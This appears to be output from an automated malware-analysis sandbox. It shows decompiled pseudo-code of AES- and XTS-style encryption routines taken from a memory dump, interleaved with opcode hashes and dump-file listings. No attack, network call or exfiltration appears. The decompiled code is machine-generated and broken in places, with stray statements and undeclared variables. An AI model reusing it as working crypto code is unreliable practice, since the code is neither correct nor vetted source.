                                                              • Opcode ID: 0143fbb01e4cb802368a0b9f9344aaf815a2c6f2a28245d16c8935a4c8e93d81
                                                              • Instruction ID: 05d082330c416e67c06a532964af8df8e1104b9eb0c871c855bdc4d54a32604c
                                                              • Opcode Fuzzy Hash: 0143fbb01e4cb802368a0b9f9344aaf815a2c6f2a28245d16c8935a4c8e93d81
                                                              • Instruction Fuzzy Hash: CDF1B571344B058FC758DE5DDDA1B16F7E5AB88318F19C728919ACBB64E378F8068B80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fcf8165f92d58746db6ffb2313d7d0f646d31432b630f7e24032bf6c571f3fca
                                                              • Instruction ID: 67c2d12953c04ce1c5b20a45600b2b477edb8edda71b703bf6eaefe1e40b69a9
                                                              • Opcode Fuzzy Hash: fcf8165f92d58746db6ffb2313d7d0f646d31432b630f7e24032bf6c571f3fca
                                                              • Instruction Fuzzy Hash: 79024225C18FDA86E7129B3DC442977B7A0BFEA248F10DB1EFDD436511EB31A684E241
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c22bcfaca740829001c9608f6768e92eee537ddf69eca220a62b7339dbf2fe25
                                                              • Instruction ID: c40451b9722e86d336282527c80f3273918cb54feda345876b7cea28716a1061
                                                              • Opcode Fuzzy Hash: c22bcfaca740829001c9608f6768e92eee537ddf69eca220a62b7339dbf2fe25
                                                              • Instruction Fuzzy Hash: 20027225C18FDA86E7129B3DC442677F7A0BFEA248F10DB1EFDD532911EB21A644E241
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 70112ff4cfd3648cb52c69d271e6e278981b08f221d1e353d51558c74d483210
                                                              • Instruction ID: dbe71aeeadd51f2a7590fa2acb61780a6cc4af412bca940ed9982e5f378ce752
                                                              • Opcode Fuzzy Hash: 70112ff4cfd3648cb52c69d271e6e278981b08f221d1e353d51558c74d483210
                                                              • Instruction Fuzzy Hash: A3F17221C1DFDA87D6129B3A8542166F3A0BFFB284F14EB1AFDD435412EB61B2D59240
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 60%
                                                              			E00B9F830(signed int __eax, signed int __ebx, signed int __ecx, signed int __edx, signed int* __edi) {
                                                              				signed char _t119;
                                                              				signed int _t125;
                                                              				signed int _t128;
                                                              				signed int _t141;
                                                              				signed int _t153;
                                                              				signed int _t156;
                                                              				unsigned int _t170;
                                                              				signed int _t174;
                                                              				signed int _t188;
                                                              				signed int _t193;
                                                              				unsigned int _t203;
                                                              				signed int _t208;
                                                              				signed int* _t310;
                                                              				intOrPtr _t427;
                                                              				void* _t440;
                                                              
                                                              				 *(_t440 + 0x14) = __edi;
                                                              				_t119 = __eax ^  *__edi;
                                                              				_t141 = __ebx ^ __edi[1];
                                                              				_t170 = __ecx ^ __edi[2];
                                                              				_t203 = __edx ^ __edi[3];
                                                              				 *((intOrPtr*)(_t440 + 0x18)) = __edi + (__edi[0x3c] + __edi[0x3c] - 2) * 8;
                                                              				0;
                                                              				do {
                                                              					 *(_t440 + 4) =  *(_t427 + (_t119 & 0x000000ff) - 0x80) & 0x000000ff ^ ( *(_t427 + (_t203 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000008 ^ ( *(_t427 + (_t170 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000010 ^ ( *(_t427 + (_t141 >> 0x18) - 0x80) & 0x000000ff) << 0x00000018;
                                                              					 *(_t440 + 8) =  *(_t427 + (_t141 & 0x000000ff) - 0x80) & 0x000000ff ^ ( *(_t427 + (_t119 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000008 ^ ( *(_t427 + (_t203 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000010 ^ ( *(_t427 + (_t170 >> 0x18) - 0x80) & 0x000000ff) << 0x00000018;
                                                              					_t174 =  *(_t427 + (_t170 & 0x000000ff) - 0x80) & 0x000000ff ^ ( *(_t427 + (_t141 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000008 ^ ( *(_t427 + (_t119 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000010 ^ ( *(_t427 + (_t203 >> 0x18) - 0x80) & 0x000000ff) << 0x00000018;
                                                              					_t208 =  *(_t427 + (_t203 & 0x000000ff) - 0x80) & 0x000000ff ^ ( *(_t427 + (_t170 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000008 ^ ( *(_t427 + (_t141 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000010 ^ ( *(_t427 + (_t119 >> 0x18) - 0x80) & 0x000000ff) << 0x00000018;
                                                              					_t125 = _t174 + _t174 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t174) >> 0x00000007) & 0x1b1b1b1b;
                                                              					_t148 = _t125 + _t125 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t125) >> 0x00000007) & 0x1b1b1b1b;
                                                              					asm("rol ecx, 0x8");
                                                              					asm("rol eax, 0x18");
                                                              					asm("rol ebx, 0x10");
                                                              					asm("rol ebp, 0x8");
                                                              					_t128 =  *(_t440 + 4);
                                                              					 *(_t440 + 0xc) = _t174 ^ _t125 ^ _t174 ^ _t125 + _t125 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t125) >> 0x00000007) & 0x1b1b1b1b ^ _t174 ^ (_t125 + _t125 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t125) >> 0x00000007) & 0x1b1b1b1b) + _t148 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t148) >> 0x00000007) & 0x1b1b1b1b ^ _t125 ^ _t174 ^ (_t125 + _t125 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t125) >> 0x00000007) & 0x1b1b1b1b) + _t148 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t148) >> 0x00000007) & 0x1b1b1b1b ^ _t125 + _t125 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t125) >> 0x00000007) & 0x1b1b1b1b ^ _t174 ^ (_t125 + _t125 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t125) >> 0x00000007) & 0x1b1b1b1b) + _t148 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t148) >> 0x00000007) & 0x1b1b1b1b ^ (_t125 + _t125 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t125) >> 0x00000007) & 0x1b1b1b1b) + _t148 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t148) >> 0x00000007) & 0x1b1b1b1b;
                                                              					_t153 = _t208 + _t208 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t208) >> 0x00000007) & 0x1b1b1b1b;
                                                              					_t183 = _t153 + _t153 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t153) >> 0x00000007) & 0x1b1b1b1b;
                                                              					asm("rol edx, 0x8");
                                                              					asm("rol ebx, 0x18");
                                                              					asm("rol ecx, 0x10");
                                                              					asm("rol ebp, 0x8");
                                                              					_t156 =  *(_t440 + 8);
                                                              					 *(_t440 + 0x10) = _t208 ^ _t153 ^ _t208 ^ _t153 + _t153 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t153) >> 0x00000007) & 0x1b1b1b1b ^ _t208 ^ (_t153 + _t153 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t153) >> 0x00000007) & 0x1b1b1b1b) + _t183 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t183) >> 0x00000007) & 0x1b1b1b1b ^ _t153 ^ _t208 ^ (_t153 + _t153 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t153) >> 0x00000007) & 0x1b1b1b1b) + _t183 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t183) >> 0x00000007) & 0x1b1b1b1b ^ _t153 + _t153 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t153) >> 0x00000007) & 0x1b1b1b1b ^ _t208 ^ (_t153 + _t153 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t153) >> 0x00000007) & 0x1b1b1b1b) + _t183 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t183) >> 0x00000007) & 0x1b1b1b1b ^ (_t153 + _t153 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t153) >> 0x00000007) & 0x1b1b1b1b) + _t183 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t183) >> 0x00000007) & 0x1b1b1b1b;
                                                              					_t188 = _t128 + _t128 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t128) >> 0x00000007) & 0x1b1b1b1b;
                                                              					_t217 = _t188 + _t188 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t188) >> 0x00000007) & 0x1b1b1b1b;
                                                              					asm("rol eax, 0x8");
                                                              					asm("rol ecx, 0x18");
                                                              					asm("rol edx, 0x10");
                                                              					asm("rol ebp, 0x8");
                                                              					_t193 = _t156 + _t156 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t156) >> 0x00000007) & 0x1b1b1b1b;
                                                              					_t222 = _t193 + _t193 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t193) >> 0x00000007) & 0x1b1b1b1b;
                                                              					asm("rol ebx, 0x8");
                                                              					asm("rol ecx, 0x18");
                                                              					asm("rol edx, 0x10");
                                                              					asm("rol ebp, 0x8");
                                                              					_t427 =  *((intOrPtr*)(_t440 + 0x1c));
                                                              					_t310 =  &(( *(_t440 + 0x14))[4]);
                                                              					_t119 = _t128 ^ _t188 ^ _t128 ^ _t188 + _t188 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t188) >> 0x00000007) & 0x1b1b1b1b ^ _t128 ^ (_t188 + _t188 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t188) >> 0x00000007) & 0x1b1b1b1b) + _t217 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t217) >> 0x00000007) & 0x1b1b1b1b ^ _t188 ^ _t128 ^ (_t188 + _t188 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t188) >> 0x00000007) & 0x1b1b1b1b) + _t217 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t217) >> 0x00000007) & 0x1b1b1b1b ^ _t188 + _t188 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t188) >> 0x00000007) & 0x1b1b1b1b ^ _t128 ^ (_t188 + _t188 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t188) >> 0x00000007) & 0x1b1b1b1b) + _t217 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t217) >> 0x00000007) & 0x1b1b1b1b ^ (_t188 + _t188 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t188) >> 0x00000007) & 0x1b1b1b1b) + _t217 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t217) >> 0x00000007) & 0x1b1b1b1b ^  *_t310;
                                                              					_t141 = _t156 ^ _t193 ^ _t156 ^ _t193 + _t193 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t193) >> 0x00000007) & 0x1b1b1b1b ^ _t156 ^ (_t193 + _t193 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t193) >> 0x00000007) & 0x1b1b1b1b) + _t222 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t222) >> 0x00000007) & 0x1b1b1b1b ^ _t193 ^ _t156 ^ (_t193 + _t193 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t193) >> 0x00000007) & 0x1b1b1b1b) + _t222 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t222) >> 0x00000007) & 0x1b1b1b1b ^ _t193 + _t193 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t193) >> 0x00000007) & 0x1b1b1b1b ^ _t156 ^ (_t193 + _t193 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t193) >> 0x00000007) & 0x1b1b1b1b) + _t222 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t222) >> 0x00000007) & 0x1b1b1b1b ^ (_t193 + _t193 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t193) >> 0x00000007) & 0x1b1b1b1b) + _t222 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t222) >> 0x00000007) & 0x1b1b1b1b ^ _t310[1];
                                                              					_t170 =  *(_t440 + 0xc) ^ _t310[2];
                                                              					_t203 =  *(_t440 + 0x10) ^ _t310[3];
                                                              					 *(_t440 + 0x14) = _t310;
                                                              				} while (_t310 <  *((intOrPtr*)(_t440 + 0x18)));
                                                              				 *(_t440 + 4) =  *(_t427 + (_t119 & 0x000000ff) - 0x80) & 0x000000ff ^ ( *(_t427 + (_t203 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000008 ^ ( *(_t427 + (_t170 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000010 ^ ( *(_t427 + (_t141 >> 0x18) - 0x80) & 0x000000ff) << 0x00000018;
                                                              				 *(_t440 + 8) =  *(_t427 + (_t141 & 0x000000ff) - 0x80) & 0x000000ff ^ ( *(_t427 + (_t119 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000008 ^ ( *(_t427 + (_t203 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000010 ^ ( *(_t427 + (_t170 >> 0x18) - 0x80) & 0x000000ff) << 0x00000018;
                                                              				return  *(_t440 + 4) ^ ( *(_t440 + 0x14))[4];
                                                              			}



















                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 01b1297a424d3e39430ecae581cbbc167fce1ddec024d9f867a3e2aac9254bbd
                                                              • Instruction ID: db54121c83a10348ae51b35bc939bb9935a6b769c24c3e6fc7763897f8bfd582
                                                              • Opcode Fuzzy Hash: 01b1297a424d3e39430ecae581cbbc167fce1ddec024d9f867a3e2aac9254bbd
                                                              • Instruction Fuzzy Hash: B8C12A73E24B7906D7649E7F8C400A9B6E39FC4120F9F47BDDC98A7342C930690A86D0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dd09723fc643d0e2ee6b257d94cca0fce2373df82c73f826f93028f387d61145
                                                              • Instruction ID: 47aeaaac46cadc797a226e4c34e547b17c64e59c69488b17d9ed8be6dbaff1af
                                                              • Opcode Fuzzy Hash: dd09723fc643d0e2ee6b257d94cca0fce2373df82c73f826f93028f387d61145
                                                              • Instruction Fuzzy Hash: 3DB14D72700B164BD728EEA9DC91796B3E3AB84326F8EC73C9046C6F55F2BCA4454680
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 01eef35076e03c2ca61ca294521eaf8e3a6a0edeb0c2c68d9f1c504fd829c17a
                                                              • Instruction ID: 58af92707fcffe75dc7a8cf830905ba58bf6bd22fe011ea109a0b16b5680ea3b
                                                              • Opcode Fuzzy Hash: 01eef35076e03c2ca61ca294521eaf8e3a6a0edeb0c2c68d9f1c504fd829c17a
                                                              • Instruction Fuzzy Hash: C5E17E21C1DFDA87D6129B3E8542166F3A0BFFB288F14DB1AFDD435422EB61B2D59240
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 77%
                                                              			E00BA3CD0(intOrPtr __edx) {
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t192;
                                                              				signed int _t194;
                                                              				void* _t196;
                                                              				signed int _t199;
                                                              				intOrPtr* _t205;
                                                              				intOrPtr* _t209;
                                                              				signed int* _t217;
                                                              				intOrPtr* _t218;
                                                              				intOrPtr* _t226;
                                                              				signed int _t229;
                                                              				signed int _t230;
                                                              				signed char _t235;
                                                              				signed int _t237;
                                                              				intOrPtr _t238;
                                                              				intOrPtr _t241;
                                                              				signed int _t243;
                                                              				signed char* _t244;
                                                              				signed int _t251;
                                                              				intOrPtr _t254;
                                                              				intOrPtr _t255;
                                                              				signed int _t256;
                                                              				char* _t274;
                                                              				signed int _t287;
                                                              				signed int _t289;
                                                              				signed int _t301;
                                                              				signed int _t307;
                                                              				void* _t310;
                                                              				intOrPtr _t312;
                                                              				void* _t315;
                                                              				void* _t320;
                                                              				void* _t325;
                                                              				signed int _t329;
                                                              				signed int* _t331;
                                                              				intOrPtr _t332;
                                                              				intOrPtr _t333;
                                                              				intOrPtr _t334;
                                                              				signed int* _t336;
                                                              				intOrPtr _t337;
                                                              				void* _t338;
                                                              				intOrPtr _t342;
                                                              				intOrPtr _t354;
                                                              				signed int _t356;
                                                              				signed int _t360;
                                                              				intOrPtr _t362;
                                                              				signed int _t370;
                                                              				void* _t371;
                                                              				void* _t372;
                                                              
                                                              				E00C6BB10(0x4c);
                                                              				_t192 =  *0xcc5970; // 0x851ab4dd
                                                              				 *(_t370 + 0x48) = _t192 ^ _t370;
                                                              				_t255 =  *((intOrPtr*)(_t370 + 0x50));
                                                              				_t194 =  *(_t370 + 0x54);
                                                              				_t235 =  *(_t370 + 0x64);
                                                              				_t336 =  *(_t370 + 0x60);
                                                              				_t331 =  *(_t370 + 0x68);
                                                              				 *((intOrPtr*)(_t370 + 0x18)) = _t255;
                                                              				if(_t235 >= 0x10) {
                                                              					 *((intOrPtr*)(_t370 + 0x34)) =  *_t194;
                                                              					 *((intOrPtr*)(_t370 + 0x38)) =  *((intOrPtr*)(_t194 + 4));
                                                              					 *((intOrPtr*)(_t370 + 0x3c)) =  *((intOrPtr*)(_t194 + 8));
                                                              					 *((intOrPtr*)(_t370 + 0x40)) =  *((intOrPtr*)(_t194 + 0xc));
                                                              					_t196 = _t370 + 0x38;
                                                              					 *((intOrPtr*)( *((intOrPtr*)(_t255 + 0xc))))(_t196, _t196,  *((intOrPtr*)(_t255 + 4)));
                                                              					_t371 = _t370 + 0xc;
                                                              					if( *((intOrPtr*)(_t371 + 0x70)) == 0 && (_t235 & 0x0000000f) != 0) {
                                                              						_t235 = _t235 - 0x10;
                                                              						 *(_t371 + 0x6c) = _t235;
                                                              					}
                                                              					_t301 =  *(_t371 + 0x40);
                                                              					_t199 =  *(_t371 + 0x3c);
                                                              					_t256 =  *(_t371 + 0x38);
                                                              					_t356 =  *(_t371 + 0x38);
                                                              					if(_t235 < 0x10) {
                                                              						L8:
                                                              						if( *((intOrPtr*)(_t371 + 0x74)) == 0) {
                                                              							_t237 = _t301 >> 0x0000001f & 0x00000087 ^ _t356 + _t356;
                                                              							 *(_t371 + 0x4c) = 0;
                                                              							_t307 =  *(_t371 + 0x4c) ^ (_t256 << 0x00000020 | _t356) << 0x1;
                                                              							_t360 = _t256 >> 0x0000001f | _t199 + _t199;
                                                              							 *(_t371 + 0x24) = 0;
                                                              							 *(_t371 + 0x54) =  *(_t371 + 0x24) | ( *(_t371 + 0x44) << 0x00000020 | _t199) << 0x1;
                                                              							 *(_t371 + 0x28) =  *_t336 ^ _t237;
                                                              							 *(_t371 + 0x4c) = _t307;
                                                              							 *(_t371 + 0x2c) = _t336[1] ^ _t307;
                                                              							_t205 =  *((intOrPtr*)(_t371 + 0x1c));
                                                              							 *(_t371 + 0x30) = _t336[2] ^ _t360;
                                                              							 *(_t371 + 0x34) = _t336[3] ^  *(_t371 + 0x54);
                                                              							_t310 = _t371 + 0x2c;
                                                              							 *((intOrPtr*)( *((intOrPtr*)(_t205 + 8))))(_t310, _t310,  *_t205);
                                                              							_t312 =  *((intOrPtr*)(_t371 + 0x7c));
                                                              							 *(_t371 + 0x34) =  *(_t371 + 0x34) ^ _t237;
                                                              							 *(_t371 + 0x38) =  *(_t371 + 0x38) ^  *(_t371 + 0x58);
                                                              							 *(_t371 + 0x3c) =  *(_t371 + 0x3c) ^ _t360;
                                                              							 *(_t371 + 0x40) =  *(_t371 + 0x40) ^  *(_t371 + 0x60);
                                                              							_t372 = _t371 + 0xc;
                                                              							if(_t312 > 0) {
                                                              								_t274 = _t372 + 0x28;
                                                              								_t217 =  &(_t331[4]);
                                                              								_t338 = _t336 - _t331;
                                                              								_t362 = _t312;
                                                              								do {
                                                              									 *_t217 =  *_t274;
                                                              									 *_t274 =  *((intOrPtr*)(_t217 + _t338));
                                                              									_t217 =  &(_t217[0]);
                                                              									_t274 = _t274 + 1;
                                                              									_t362 = _t362 - 1;
                                                              								} while (_t362 != 0);
                                                              							}
                                                              							 *(_t372 + 0x28) =  *(_t372 + 0x28) ^  *(_t372 + 0x38);
                                                              							 *(_t372 + 0x2c) =  *(_t372 + 0x2c) ^  *(_t372 + 0x3c);
                                                              							_t209 =  *((intOrPtr*)(_t372 + 0x1c));
                                                              							 *(_t372 + 0x30) =  *(_t372 + 0x30) ^  *(_t372 + 0x40);
                                                              							 *(_t372 + 0x34) =  *(_t372 + 0x34) ^  *(_t372 + 0x44);
                                                              							_t315 = _t372 + 0x2c;
                                                              							 *((intOrPtr*)( *((intOrPtr*)(_t209 + 8))))(_t315, _t315,  *_t209);
                                                              							_t318 =  *(_t372 + 0x3c) ^  *(_t372 + 0x4c);
                                                              							 *_t331 =  *(_t372 + 0x34) ^  *(_t372 + 0x44);
                                                              							_t373 = _t372 + 0xc;
                                                              							_t331[1] =  *(_t372 + 0x38) ^  *(_t372 + 0x48);
                                                              							_t331[2] =  *(_t372 + 0x3c) ^  *(_t372 + 0x4c);
                                                              							_t331[3] =  *(_t372 + 0x40) ^  *(_t372 + 0x50);
                                                              							goto L18;
                                                              						} else {
                                                              							 *(_t371 + 0x14) = 0;
                                                              							if( *((intOrPtr*)(_t371 + 0x70)) > 0) {
                                                              								 *((intOrPtr*)(_t371 + 0x20)) = _t336 - _t331;
                                                              								_t243 = _t331 - _t371 + 0x28;
                                                              								 *(_t371 + 0x48) = _t243;
                                                              								while(1) {
                                                              									_t244 =  &((_t371 +  *(_t371 + 0x14) + 0x28)[_t243]);
                                                              									 *(_t371 + 0x18) = _t244;
                                                              									 *(_t371 + 0x13) = _t244[ *((intOrPtr*)(_t371 + 0x20))] & 0x000000ff;
                                                              									 *( *(_t371 + 0x18)) =  *(_t371 +  *(_t371 + 0x14) + 0x28) & 0x000000ff;
                                                              									 *(_t371 + 0x14) =  *(_t371 + 0x14) + 1;
                                                              									 *(_t371 +  *(_t371 + 0x14) + 0x28) =  *(_t371 + 0x13) & 0x000000ff;
                                                              									if( *(_t371 + 0x14) >=  *((intOrPtr*)(_t371 + 0x70))) {
                                                              										goto L13;
                                                              									}
                                                              									_t243 =  *(_t371 + 0x48);
                                                              								}
                                                              							}
                                                              							L13:
                                                              							 *(_t371 + 0x30) =  *(_t371 + 0x30) ^ _t199;
                                                              							_t218 =  *((intOrPtr*)(_t371 + 0x1c));
                                                              							 *(_t371 + 0x2c) =  *(_t371 + 0x2c) ^ _t256;
                                                              							 *(_t371 + 0x34) =  *(_t371 + 0x34) ^ _t301;
                                                              							 *(_t371 + 0x28) =  *(_t371 + 0x28) ^ _t356;
                                                              							_t320 = _t371 + 0x2c;
                                                              							 *((intOrPtr*)( *((intOrPtr*)(_t218 + 8))))( *_t218);
                                                              							 *(_t331 - 0x10) =  *(_t371 + 0x34) ^  *(_t371 + 0x44);
                                                              							 *(_t331 - 0xc) =  *(_t371 + 0x38) ^  *(_t371 + 0x48);
                                                              							 *(_t331 - 8) =  *(_t371 + 0x3c) ^  *(_t371 + 0x4c);
                                                              							 *(_t331 - 4) =  *(_t371 + 0x40) ^  *(_t371 + 0x50);
                                                              							_t333 = _t320;
                                                              							_t342 = _t320;
                                                              							_pop(_t241);
                                                              							return E00C69C26(0, _t241,  *(_t371 + 0x54) ^ _t371 + 0x0000000c,  *(_t371 + 0x3c) ^  *(_t371 + 0x4c), _t333, _t342);
                                                              						}
                                                              					} else {
                                                              						while(1) {
                                                              							 *(_t371 + 0x34) = _t336[3] ^ _t301;
                                                              							_t226 =  *((intOrPtr*)(_t371 + 0x1c));
                                                              							 *(_t371 + 0x30) = _t336[2] ^ _t199;
                                                              							_t325 = _t371 + 0x2c;
                                                              							 *(_t371 + 0x34) =  *_t336 ^ _t356;
                                                              							 *(_t371 + 0x38) = _t336[1] ^ _t256;
                                                              							 *((intOrPtr*)( *((intOrPtr*)(_t226 + 8))))(_t325, _t325,  *_t226);
                                                              							_t318 =  *(_t371 + 0x44);
                                                              							_t251 =  *(_t371 + 0x48);
                                                              							_t287 =  *(_t371 + 0x38) ^ _t251;
                                                              							_t229 =  *(_t371 + 0x34) ^ _t318;
                                                              							_t331[1] = _t287;
                                                              							 *(_t371 + 0x38) = _t287;
                                                              							_t289 =  *(_t371 + 0x40) ^  *(_t371 + 0x50);
                                                              							 *_t331 = _t229;
                                                              							 *(_t371 + 0x34) = _t229;
                                                              							_t230 =  *(_t371 + 0x4c);
                                                              							 *(_t371 + 0x3c) =  *(_t371 + 0x3c) ^ _t230;
                                                              							_t331[2] =  *(_t371 + 0x3c);
                                                              							_t331[3] = _t289;
                                                              							_t373 = _t371 + 0xc;
                                                              							_t336 =  &(_t336[4]);
                                                              							_t331 =  &(_t331[4]);
                                                              							_t52 = _t373 + 0x70;
                                                              							 *_t52 =  *((intOrPtr*)(_t373 + 0x70)) - 0x10;
                                                              							 *(_t373 + 0x34) = _t289;
                                                              							if( *_t52 == 0) {
                                                              								break;
                                                              							}
                                                              							_t356 =  *(_t373 + 0x44) >> 0x0000001f & 0x00000087 ^ _t318 + _t318;
                                                              							_t329 = ( *(_t373 + 0x44) << 0x00000020 | _t230) << 1;
                                                              							 *(_t373 + 0x18) = _t251 >> 0x1f;
                                                              							_t256 = 0 ^ (_t251 << 0x00000020 | _t318) << 0x1;
                                                              							_t199 = _t230 + _t230 |  *(_t373 + 0x18);
                                                              							 *(_t373 + 0x24) = _t329;
                                                              							_t301 = _t329;
                                                              							 *(_t373 + 0x38) = _t356;
                                                              							 *(_t373 + 0x3c) = _t256;
                                                              							 *(_t373 + 0x40) = _t199;
                                                              							 *(_t373 + 0x44) = _t301;
                                                              							if( *((intOrPtr*)(_t373 + 0x70)) >= 0x10) {
                                                              								continue;
                                                              							} else {
                                                              								goto L8;
                                                              							}
                                                              							goto L19;
                                                              						}
                                                              						L18:
                                                              						_pop(_t332);
                                                              						_pop(_t337);
                                                              						_pop(_t238);
                                                              						return E00C69C26(0, _t238,  *(_t373 + 0x58) ^ _t373, _t318, _t332, _t337);
                                                              					}
                                                              				} else {
                                                              					_pop(_t334);
                                                              					_pop(_t354);
                                                              					_pop(_t254);
                                                              					return E00C69C26(_t194 | 0xffffffff, _t254,  *(_t370 + 0x48) ^ _t370, __edx, _t334, _t354);
                                                              				}
                                                              				L19:
                                                              			}


                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7c77b92829dc116b239ef73597368f4f248db79573dd40e73930760c2fb966c0
                                                              • Instruction ID: 7485084bf8dee139c0055ae3a2d8b1ff430259722f89a104f68d2e41369e1d97
                                                              • Opcode Fuzzy Hash: 7c77b92829dc116b239ef73597368f4f248db79573dd40e73930760c2fb966c0
